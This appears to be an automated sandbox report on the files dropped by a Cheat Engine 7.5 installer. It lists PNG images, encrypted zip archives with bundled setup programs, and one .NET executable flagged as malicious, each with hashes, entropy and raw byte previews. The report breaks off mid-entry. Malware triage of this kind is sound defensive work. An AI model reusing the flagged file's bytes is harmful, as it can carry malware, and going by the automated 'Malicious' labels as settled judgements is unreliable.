SHA-512:	F73D60C92644E0478107E0402D1C7B4DFA1674F69B41856F74F937A7B57CEAA2B3BE9242F2B59F1FCF71063AAC6CBE16C594618D1A8CDD181510DE3240F31DFF
Malicious:	false
Preview:	.PNG........IHDR.......h.......(.....pHYs.................sRGB.........gAMA......a...([IDATx.....U./.?...0'.H.%.A$.N....t.+. .1....].8..8...q...D.OQ.t>G...}Z.x.t.(.....#..........vF0'<;!..;.k..].T....t...._U...k.........................................................................................................................................................................[.````````p.c..v*..jii.,.Z.+...B.tySSSc......3.&..........G$J.....:X2v3....mkk.P... ..K.n.X,R.......n.............j.g..].v..>...P}..Mo.z........Am`c.4.h.`..E.F.f..-........G..6............$..=p......Floh.................Fc..mP..R.........50000008".7.)S2.6=..c+P....K.].]=. ..]..{.........$L...IM+. ...!.?.q.g....4..............SZ".Xe..G.-]#..7.!.)]t\|VW..-]...}.KW.t..8.."...-.."..`...u.0...uI...q(.N.?.0.J.p..m$/S.H..D.cJx. hU.]q.j...t...T.m......A...Y....r.........0.f....UD.J.V.g0.y/\|C.4l!..jix.{V...o.. ..V...9K..7:..D...u....e.\|.-.J.Z../. . .. !.:.,...u...50000008R`...W.c.2.(..

C:\Users\user\AppData\Local\Temp\is-3E079.tmp\WeatherZero.png (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
File Type:	PNG image data, 700 x 360, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	30586
Entropy (8bit):	7.919646221064304
Encrypted:	false
SSDEEP:	768:Fk7fJC9WjOI1DaGmnitN039DODp56Ys+9S/IUM+:FktpB4FiQ3qd9S/BN
MD5:	9AC6287111CB2B272561781786C46CDD
SHA1:	6B02F2307EC17D9325523AF1D27A6CB386C8F543
SHA-256:	AB99CDB7D798CB7B7D8517584D546AA4ED54ECA1B808DE6D076710C8A400C8C4
SHA-512:	F998A4E0CE14B3898A72E0B8A3F7154FC87D2070BADCFA98582E3B570CA83A562D5A0C95F999A4B396619DB42AB6269A2BAC47702597C5A2C37177441723D837
Malicious:	false
Preview:	.PNG........IHDR.......h.......(.....pHYs.................sRGB.........gAMA......a...w.IDATx....]Wu.5....$...U....!...t.H"...#9.yI'...30H........$'a6...D..NwB...4.tB.$...'......0.d.z}W.+/-.3.[u.=....S..{X{.i.}....B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!D.1#.I....C.g.~.....1...3_r....OB.!..bJ...2k......;..~....q`.f..ov.B.!...!.w.....<..S..w.}?f.^\|..w.s.=o.i..M.!...&2.&...~..mt.a;`.>h.....o.}........n.u..?...B.!D-d.N2../...3g..5k.o...<.....s..7C.I....3f._I.!..B.B....n.i.......f...[..}.........;b...........k.Gg.{.....v...fa...^x_.B.!......dFFF0:....Uf.>...,<{..6..C........g.s.=.f.....;<<\|8.!..B.Z...$..../8~....h]o...8.Q./.../..?OB.!...cd.N....^j...;........N.....\|......B..`.....W.............1..#....C........ ..C...X.\|.U.....^...;.x...w../..;6.a....W-Z..$..B4.3t.mpg{{..6;.[.z.8...t..!3t....<Xg.....p....F.o.\|.+_y.y.>k..........=.IO.&....Y..a.c....k...[....{$.!....

C:\Users\user\AppData\Local\Temp\is-3E079.tmp\WebAdvisor.png (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
File Type:	PNG image data, 700 x 360, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	48743
Entropy (8bit):	7.952703392311964
Encrypted:	false
SSDEEP:	768:RtwR1Dy4rQznr1GYfvLn6froelhVNSyCPtSOeVlTTqYueg:zwR1DybhPwhvSyClSOk/geg
MD5:	4CFFF8DC30D353CD3D215FD3A5DBAC24
SHA1:	0F4F73F0DDDC75F3506E026EF53C45C6FAFBC87E
SHA-256:	0C430E56D69435D8AB31CBB5916A73A47D11EF65B37D289EE7D11130ADF25856
SHA-512:	9D616F19C2496BE6E89B855C41BEFC0235E3CE949D2B2AE7719C823F10BE7FE0809BDDFD93E28735B36271083DD802AE349B3AB7B60179B269D4A18C6CEF4139
Malicious:	false
Preview:	.PNG........IHDR.......h.......(.....pHYs.................sRGB.........gAMA......a.....IDATx...eIu....(..Y31.}q....`...t....Z..8t;x3._@.3.0.{.E.".&.5.g.C..@..%.>r.5....B...O...^.*..s....{.7..{....r..+W...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(.n+.t.B.p.x.....^.?/....p,..7...{.P(...B.H...r.y..\|.....{l\tO.\|..<..P(....w......o..P(.<h...n[\tO..?......E...}...F.P83....<z.....W..7...w.....?..?.YW(.N.......?N[..E..A..z..[...'.$..'....8...?~.K.\|........[#.....6........;.......s.=...}.c...{.._..z....;w..........(../..n...?..??..?.........z.......~....[o.<.......x.).Z.(..s.N..Wb.....f....../.P8.\|.......?..#......2vO....F......@.\|..w7].\|..$..}?.L.Go...A.1..^...j...$.6....~..x...{..IwD`\|..?.....?...{..~~........).........`$.......tG....\|.n.2..........[..._....e.}.=..<........h.7\|?Kg....+

C:\Users\user\AppData\Local\Temp\is-3E079.tmp\_isetup\_setup64.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	4.720366600008286
Encrypted:	false
SSDEEP:	96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
MD5:	E4211D6D009757C078A9FAC7FF4F03D4
SHA1:	019CD56BA687D39D12D4B13991C9A42EA6BA03DA
SHA-256:	388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
SHA-512:	17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..\|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-3E079.tmp\error.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
File Type:	PNG image data, 768 x 768, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	255196
Entropy (8bit):	7.96973939556344
Encrypted:	false
SSDEEP:	6144:SpgUGHaX5IfwHkEe6PgHV90nLp8M8yv0zXqtveJsGfr5:SpghMe6IDop8Mjv0Yv+sGD5
MD5:	2C5238DA8AAF78FB2722F82435B59EB0
SHA1:	8AB4DBABEFD458CEBCD47C2CB144D79804303954
SHA-256:	1AEE87904EAAC431C564438807BDBD8FB34290831E7B3C0A502FDF1EF8EAA6A1
SHA-512:	EE71A321042F1DFC9660CE84337AB68C50EA40A2B97A0CA7313C433F2DB39769B17039E628B5EA60E3D4FF87DCB3401D98E4670EE82C88920996A641DEA7EFFA
Malicious:	false
Preview:	.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs.........j......IDATx^....e.u...}..Y...@P.$.Z....{u...6"Q...@.$H6gI.n..Z"..(....J[ .^.gZ..(Q$@..../......}.y7......../.D..'"n.......@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .......V.z..u.[.#.....4.......[..[....466.fgg

C:\Users\user\AppData\Local\Temp\is-3E079.tmp\finish.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
File Type:	PNG image data, 768 x 768, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	254279
Entropy (8bit):	7.968301085693523
Encrypted:	false
SSDEEP:	6144:1QdvglrmnluatdNn508GtXT3YoTkT1ZLw9p2Hpsx/F:2dvglo/nX67HW1ZL8EJ2/F
MD5:	B24E872BD8F92295273197602AAC8352
SHA1:	2A9B0EBE62E21E9993AA5BFAAADE14D2DDA3B291
SHA-256:	41031EFC4F7E322DC5FFACC94B9296FB28B9B922B1CE3B3DA13BF659A5FD2985
SHA-512:	F08AC681ABC4E0F6D7A1D1F2303169004E67C880F9353C0ED11DFAB3EB511DDF841FA056F4090DA8201C822C66AE55419C48CD87F11B9866FEB46A3FE2C2AF99
Malicious:	false
Preview:	.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs.........j......IDATx^....f.y...w.......IQ.l..3.,O.'..Lb[".}.bJ.DI...$.j;.D.$....@7z.%;...L..X.,..}m...}..........}o.h,D....{.NU.:u...........@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ ....o.;.o.....m..w.G ..\.h.3.....w..[.VCCCidd

C:\Users\user\AppData\Local\Temp\is-3E079.tmp\is-0VO77.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
File Type:	PNG image data, 700 x 360, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	75974
Entropy (8bit):	7.973739579566582
Encrypted:	false
SSDEEP:	1536:cyfQCzB7fBVwtW5EGtWO7Cemktbbv36SEOW9izF:cyfJ/2WXz7Fbbf61OW9aF
MD5:	CD09F361286D1AD2622BA8A57B7613BD
SHA1:	4CD3E5D4063B3517A950B9D030841F51F3C5F1B1
SHA-256:	B92A31D4853D1B2C4E5B9D9624F40B439856D0C6A517E100978CBDE8D3C47DC8
SHA-512:	F73D60C92644E0478107E0402D1C7B4DFA1674F69B41856F74F937A7B57CEAA2B3BE9242F2B59F1FCF71063AAC6CBE16C594618D1A8CDD181510DE3240F31DFF
Malicious:	false
Preview:	.PNG........IHDR.......h.......(.....pHYs.................sRGB.........gAMA......a...([IDATx.....U./.?...0'.H.%.A$.N....t.+. .1....].8..8...q...D.OQ.t>G...}Z.x.t.(.....#..........vF0'<;!..;.k..].T....t...._U...k.........................................................................................................................................................................[.````````p.c..v*..jii.,.Z.+...B.tySSSc......3.&..........G$J.....:X2v3....mkk.P... ..K.n.X,R.......n.............j.g..].v..>...P}..Mo.z........Am`c.4.h.`..E.F.f..-........G..6............$..=p......Floh.................Fc..mP..R.........50000008".7.)S2.6=..c+P....K.].]=. ..]..{.........$L...IM+. ...!.?.q.g....4..............SZ".Xe..G.-]#..7.!.)]t\|VW..-]...}.KW.t..8.."...-.."..`...u.0...uI...q(.N.?.0.J.p..m$/S.H..D.cJx. hU.]q.j...t...T.m......A...Y....r.........0.f....UD.J.V.g0.y/\|C.4l!..jix.{V...o.. ..V...9K..7:..D...u....e.\|.-.J.Z../. . .. !.:.,...u...50000008R`...W.c.2.(..

C:\Users\user\AppData\Local\Temp\is-3E079.tmp\is-3M2N1.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	527389
Entropy (8bit):	7.995975187354872
Encrypted:	true
SSDEEP:	12288:ib5kasT/hWZEu58IbccPqwozk/2rYJb69+J2W:M5kzT/hWZjfbccPOzk/aIb3J2W
MD5:	F68008B70822BD28C82D13A289DEB418
SHA1:	06ABBE109BA6DFD4153D76CD65BFFFAE129C41D8
SHA-256:	CC6F4FAF4E8A9F4D2269D1D69A69EA326F789620FB98078CC98597F3CB998589
SHA-512:	FA482942E32E14011AE3C6762C638CCB0A0E8EC0055D2327C3ACC381DDDF1400DE79E4E9321A39A418800D072E59C36B94B13B7EB62751D3AEC990FB38CE9253
Malicious:	false
Preview:	PK.........\zX...............saBSI.exe.Z.pT.u.+i..eW c....&....l.....Y[...-@`....e.....;r.T...MJ3.a.]..h:.VF?.u...T...+..()..;...v..[v...........]....s......[..!.....A!?N..?%&!.....1...}AS...U)._t4.;z........9r....A..G...86l}.....EVk.J......t.[E....w...x..+Wx...gg.Qz>...f...8.q^.?..)~..o..B.!z...)....m.{7..F...w....O.+.lz..].......I.......v..=....S.i.=.r..J.....!.xI2D...!.5..S..r...Rz..@`......Ol....]4..(......]..K..%.I,.8?]"..Y..k\|...%.W.#.p....5.li....r.A.5-......X....B.e.J.s.9...s."..S.NE.Fq...D\...0!....v..../..{....sL(6l.E8g...G...!V......^..\|.Dp.k....W-B9.."B-.-...h.(..4.9>..&.3.2<.V.x.\|T...Ke}.b.G.&1...!..>..P(..2~....~...S....B.d.$......,...O..B9.`.....X}B......B9.`a.8..0....l..B......\|..0.b....N...0....%.^.`..0....{...MY.....4..H.'......Il....(..&.e.:&.X=$...+..P..na...C.~]...n...2..n..a0.U...>.0..2.....`..4...<.0.e..a._f0...[.....2..i._c0..i.^....(.).G.\|.....$....^.YR..R...<.`.....l'@..2...V[..0..B*.s......2x...........`'.(.Y...\.`..$

C:\Users\user\AppData\Local\Temp\is-3E079.tmp\is-9PD8N.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
File Type:	PNG image data, 700 x 360, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	30586
Entropy (8bit):	7.919646221064304
Encrypted:	false
SSDEEP:	768:Fk7fJC9WjOI1DaGmnitN039DODp56Ys+9S/IUM+:FktpB4FiQ3qd9S/BN
MD5:	9AC6287111CB2B272561781786C46CDD
SHA1:	6B02F2307EC17D9325523AF1D27A6CB386C8F543
SHA-256:	AB99CDB7D798CB7B7D8517584D546AA4ED54ECA1B808DE6D076710C8A400C8C4
SHA-512:	F998A4E0CE14B3898A72E0B8A3F7154FC87D2070BADCFA98582E3B570CA83A562D5A0C95F999A4B396619DB42AB6269A2BAC47702597C5A2C37177441723D837
Malicious:	false
Preview:	.PNG........IHDR.......h.......(.....pHYs.................sRGB.........gAMA......a...w.IDATx....]Wu.5....$...U....!...t.H"...#9.yI'...30H........$'a6...D..NwB...4.tB.$...'......0.d.z}W.+/-.3.[u.=....S..{X{.i.}....B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!D.1#.I....C.g.~.....1...3_r....OB.!..bJ...2k......;..~....q`.f..ov.B.!...!.w.....<..S..w.}?f.^\|..w.s.=o.i..M.!...&2.&...~..mt.a;`.>h.....o.}........n.u..?...B.!D-d.N2../...3g..5k.o...<.....s..7C.I....3f._I.!..B.B....n.i.......f...[..}.........;b...........k.Gg.{.....v...fa...^x_.B.!......dFFF0:....Uf.>...,<{..6..C........g.s.=.f.....;<<\|8.!..B.Z...$..../8~....h]o...8.Q./.../..?OB.!...cd.N....^j...;........N.....\|......B..`.....W.............1..#....C........ ..C...X.\|.U.....^...;.x...w../..;6.a....W-Z..$..B4.3t.mpg{{..6;.[.z.8...t..!3t....<Xg.....p....F.o.\|.+_y.y.>k..........=.IO.&....Y..a.c....k...[....{$.!....

C:\Users\user\AppData\Local\Temp\is-3E079.tmp\is-L3QGH.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33432
Entropy (8bit):	5.359517379714029
Encrypted:	false
SSDEEP:	768:Wj1b3suKzD3S8AktYcFA/Vc6KB5YiR2yAMxkE4gu5P:FzDC8AY8Vclv7jxfu5P
MD5:	F39C2690BCCC422B84D70E55F76640E5
SHA1:	D8D4D4391BCCB01003065593B719E65767AECF03
SHA-256:	3D57182EAC0111FD2827478722394134A39D18B9E61CEC5A053C5550411E3F3A
SHA-512:	5D52F1323B1E31A0ECD5403A840D6484053A8808ACC6979F61D1EF0C25708B6B93D98C8D832255F73382472B1207433051904B0E956DCCF469918DFDB6329A45
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0.............N1... ...@....@.. ...............................O....`..................................0..O....@..................X...`......P0..8............................................ ............... ..H............text...T.... ...................... ..`.rsrc........@......................@..@.reloc.......`.......(..............@..B................01......H........#...............................................................0..N........r...p~....o.......o....,,.o....o.....1...o.....o....r...p.(....o......o.......0..3........o....(.......o....,...o.......o......o....o.....*..0..........r...prO..p(....s.....(....(....r...p(....(..............-...........8...............%..:..o..........o.........i.0.~....+.........r...p(....-H..r...p(....-:..r...p(....-,..r...p(....-{..r...p(....-q..r...p(....-g+h..( ...-_..(........o!...

C:\Users\user\AppData\Local\Temp\is-3E079.tmp\is-PM1QD.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	6227973
Entropy (8bit):	7.999704627939555
Encrypted:	true
SSDEEP:	98304:ppxj2IwVGwxnd+P0fY8eHeM1euEuR+HW84l7mKN2Yjwov3I7qs4zLGGlFtSNNkoo:ppxZ7k00fxeHejFHW3l113I7d4zLGGTL
MD5:	7CC0288A2A8BBE014F9E344F3068C8F1
SHA1:	EB47D401AE30A308DD66BDCAFDE06CDD35E25C94
SHA-256:	200E9BC4FCF2C6682DDC8C7F172A0D02BEFECD25CA882F66C6ABC868A54B8975
SHA-512:	869F0A01EF0BCBBFC501C1786E14BFFEAA2DAAA00210C312874FC67A724C77EF61394BB5854B9A02AF654CD045C4D39AE30D73F1B4EC8AA9E531DFEEA1714476
Malicious:	false
Preview:	PK........v..U......_..._.....WZSetup.exe.}xT.7..+...{..F.....R4`.Ct..!X.&.....Bp.#......l6c9.zlk-.=.-..Z.....IP..Q.Bk.T.8Q..a.....g..y.{......?Np.^..Z.^..Zko=...Y8..".:...?7...u!................77......uk7m....-l.6.n.TX..Wx_....99YE)..z...q..p.].G.,^yt!K_}.#<..x...../?..t. .O..+p.".....%k.y..o.6ep..$...$.[...!L5.F.(.P.=._..%&....a.........@....pU....\|..\.....9.i..]<C.....Z......$..B.[3.a.Z...>.3...z=7..aT......R..O..glJU.......S...u.3..7\%.-_...?#......F..W.M.^,.o..I9rU.S.68.S..^]r.C..z...n.>..q>.:{&..s./+Z.".v.S.GT.3..6....:aM.m....r)......FS...h..c......z....(.F..........S_G.Z,..;.P...-8-...{.........'.q..Y..B....C.....t)O?&....I.w....r].....U..m.....2.:.>'..)hv<..E..oY......:;.H@?aL8X.z..,....v..@9..x2P...w..i....'.......#..G.......l.:`..D.c.]....q....CT..0.U.P.,Z.$&...(..%.Cba.9.sJ..;%....J.Q.m.....]..<`..Vk.X./7.Q.:..Pr.r&.x..B....Y...8...yJ....Q...........gRy.GV.T...II.4m(..-.0<.3.6<.H$]6..v7.R...:`..aN<#7%91C^lw'>V

C:\Users\user\AppData\Local\Temp\is-3E079.tmp\is-U4A8L.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
File Type:	PNG image data, 700 x 360, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	48743
Entropy (8bit):	7.952703392311964
Encrypted:	false
SSDEEP:	768:RtwR1Dy4rQznr1GYfvLn6froelhVNSyCPtSOeVlTTqYueg:zwR1DybhPwhvSyClSOk/geg
MD5:	4CFFF8DC30D353CD3D215FD3A5DBAC24
SHA1:	0F4F73F0DDDC75F3506E026EF53C45C6FAFBC87E
SHA-256:	0C430E56D69435D8AB31CBB5916A73A47D11EF65B37D289EE7D11130ADF25856
SHA-512:	9D616F19C2496BE6E89B855C41BEFC0235E3CE949D2B2AE7719C823F10BE7FE0809BDDFD93E28735B36271083DD802AE349B3AB7B60179B269D4A18C6CEF4139
Malicious:	false
Preview:	.PNG........IHDR.......h.......(.....pHYs.................sRGB.........gAMA......a.....IDATx...eIu....(..Y31.}q....`...t....Z..8t;x3._@.3.0.{.E.".&.5.g.C..@..%.>r.5....B...O...^.*..s....{.7..{....r..+W...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(.n+.t.B.p.x.....^.?/....p,..7...{.P(...B.H...r.y..\|.....{l\tO.\|..<..P(....w......o..P(.<h...n[\tO..?......E...}...F.P83....<z.....W..7...w.....?..?.YW(.N.......?N[..E..A..z..[...'.$..'....8...?~.K.\|........[#.....6........;.......s.=...}.c...{.._..z....;w..........(../..n...?..??..?.........z.......~....[o.<.......x.).Z.(..s.N..Wb.....f....../.P8.\|.......?..#......2vO....F......@.\|..w7].\|..$..}?.L.Go...A.1..^...j...$.6....~..x...{..IwD`\|..?.....?...{..~~........).........`$.......tG....\|.n.2..........[..._....e.}.=..<........h.7\|?Kg....+

C:\Users\user\AppData\Local\Temp\is-3E079.tmp\logo.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
File Type:	PNG image data, 768 x 768, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	254078
Entropy (8bit):	7.968268860206608
Encrypted:	false
SSDEEP:	3072:d9rAhuSnngAZK0u2vGWTbQ8VreGWVQx1RiiHs0dfo5yk5BRFOYfKa5ubF3/hlKHV:U/HJGWPQ2wV01RPQ5FoBJc+uHtjdhd3
MD5:	9CC8A637A7DE5C9C101A3047C7FBBB33
SHA1:	5E7B92E7ED3CA15D31A48EBE0297539368FFF15C
SHA-256:	8C5C80BBC6B0FDB367EAB1253517D8B156C85545A2D37D1EE4B78F3041D9B5DB
SHA-512:	CF60556817DBA2D7A39B72018F619B0DBEA36FB227526943046B67D1AE501A96C838D6D5E3DA64618592AC1E2FA14D4440BAA91618AA66256F99EA2100A427B4
Malicious:	false
Preview:	.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs.........j......IDATx^....f.y....:=....H..d[f....I.$.........)..%E7.o..H.H..@...f.%;..{.\_.%R...e.}.........N.t...B....]u...SU_....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ .x..mKU....[6..8..@.RA...@ ...#l.....N..

C:\Users\user\AppData\Local\Temp\is-3E079.tmp\prod0 (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	527389
Entropy (8bit):	7.995975187354872
Encrypted:	true
SSDEEP:	12288:ib5kasT/hWZEu58IbccPqwozk/2rYJb69+J2W:M5kzT/hWZjfbccPOzk/aIb3J2W
MD5:	F68008B70822BD28C82D13A289DEB418
SHA1:	06ABBE109BA6DFD4153D76CD65BFFFAE129C41D8
SHA-256:	CC6F4FAF4E8A9F4D2269D1D69A69EA326F789620FB98078CC98597F3CB998589
SHA-512:	FA482942E32E14011AE3C6762C638CCB0A0E8EC0055D2327C3ACC381DDDF1400DE79E4E9321A39A418800D072E59C36B94B13B7EB62751D3AEC990FB38CE9253
Malicious:	false
Preview:	PK.........\zX...............saBSI.exe.Z.pT.u.+i..eW c....&....l.....Y[...-@`....e.....;r.T...MJ3.a.]..h:.VF?.u...T...+..()..;...v..[v...........]....s......[..!.....A!?N..?%&!.....1...}AS...U)._t4.;z........9r....A..G...86l}.....EVk.J......t.[E....w...x..+Wx...gg.Qz>...f...8.q^.?..)~..o..B.!z...)....m.{7..F...w....O.+.lz..].......I.......v..=....S.i.=.r..J.....!.xI2D...!.5..S..r...Rz..@`......Ol....]4..(......]..K..%.I,.8?]"..Y..k\|...%.W.#.p....5.li....r.A.5-......X....B.e.J.s.9...s."..S.NE.Fq...D\...0!....v..../..{....sL(6l.E8g...G...!V......^..\|.Dp.k....W-B9.."B-.-...h.(..4.9>..&.3.2<.V.x.\|T...Ke}.b.G.&1...!..>..P(..2~....~...S....B.d.$......,...O..B9.`.....X}B......B9.`a.8..0....l..B......\|..0.b....N...0....%.^.`..0....{...MY.....4..H.'......Il....(..&.e.:&.X=$...+..P..na...C.~]...n...2..n..a0.U...>.0..2.....`..4...<.0.e..a._f0...[.....2..i._c0..i.^....(.).G.\|.....$....^.YR..R...<.`.....l'@..2...V[..0..B*.s......2x...........`'.(.Y...\.`..$

C:\Users\user\AppData\Local\Temp\is-3E079.tmp\prod0.zip (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	527389
Entropy (8bit):	7.995975187354872
Encrypted:	true
SSDEEP:	12288:ib5kasT/hWZEu58IbccPqwozk/2rYJb69+J2W:M5kzT/hWZjfbccPOzk/aIb3J2W
MD5:	F68008B70822BD28C82D13A289DEB418
SHA1:	06ABBE109BA6DFD4153D76CD65BFFFAE129C41D8
SHA-256:	CC6F4FAF4E8A9F4D2269D1D69A69EA326F789620FB98078CC98597F3CB998589
SHA-512:	FA482942E32E14011AE3C6762C638CCB0A0E8EC0055D2327C3ACC381DDDF1400DE79E4E9321A39A418800D072E59C36B94B13B7EB62751D3AEC990FB38CE9253
Malicious:	false
Preview:	PK.........\zX...............saBSI.exe.Z.pT.u.+i..eW c....&....l.....Y[...-@`....e.....;r.T...MJ3.a.]..h:.VF?.u...T...+..()..;...v..[v...........]....s......[..!.....A!?N..?%&!.....1...}AS...U)._t4.;z........9r....A..G...86l}.....EVk.J......t.[E....w...x..+Wx...gg.Qz>...f...8.q^.?..)~..o..B.!z...)....m.{7..F...w....O.+.lz..].......I.......v..=....S.i.=.r..J.....!.xI2D...!.5..S..r...Rz..@`......Ol....]4..(......]..K..%.I,.8?]"..Y..k\|...%.W.#.p....5.li....r.A.5-......X....B.e.J.s.9...s."..S.NE.Fq...D\...0!....v..../..{....sL(6l.E8g...G...!V......^..\|.Dp.k....W-B9.."B-.-...h.(..4.9>..&.3.2<.V.x.\|T...Ke}.b.G.&1...!..>..P(..2~....~...S....B.d.$......,...O..B9.`.....X}B......B9.`a.8..0....l..B......\|..0.b....N...0....%.^.`..0....{...MY.....4..H.'......Il....(..&.e.:&.X=$...+..P..na...C.~]...n...2..n..a0.U...>.0..2.....`..4...<.0.e..a._f0...[.....2..i._c0..i.^....(.).G.\|.....$....^.YR..R...<.`.....l'@..2...V[..0..B*.s......2x...........`'.(.Y...\.`..$

C:\Users\user\AppData\Local\Temp\is-3E079.tmp\prod0_extract\saBSI.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1184128
Entropy (8bit):	6.623147525519113
Encrypted:	false
SSDEEP:	24576:WF66IUpqM/XAl0drYaL6NFEXXN6abiklqOYadJ0CbmpV4CsCa0wDisO4qG:k/M0drYaIaXXOAqOYadJ0Cbmrhq0wTb5
MD5:	143255618462A577DE27286A272584E1
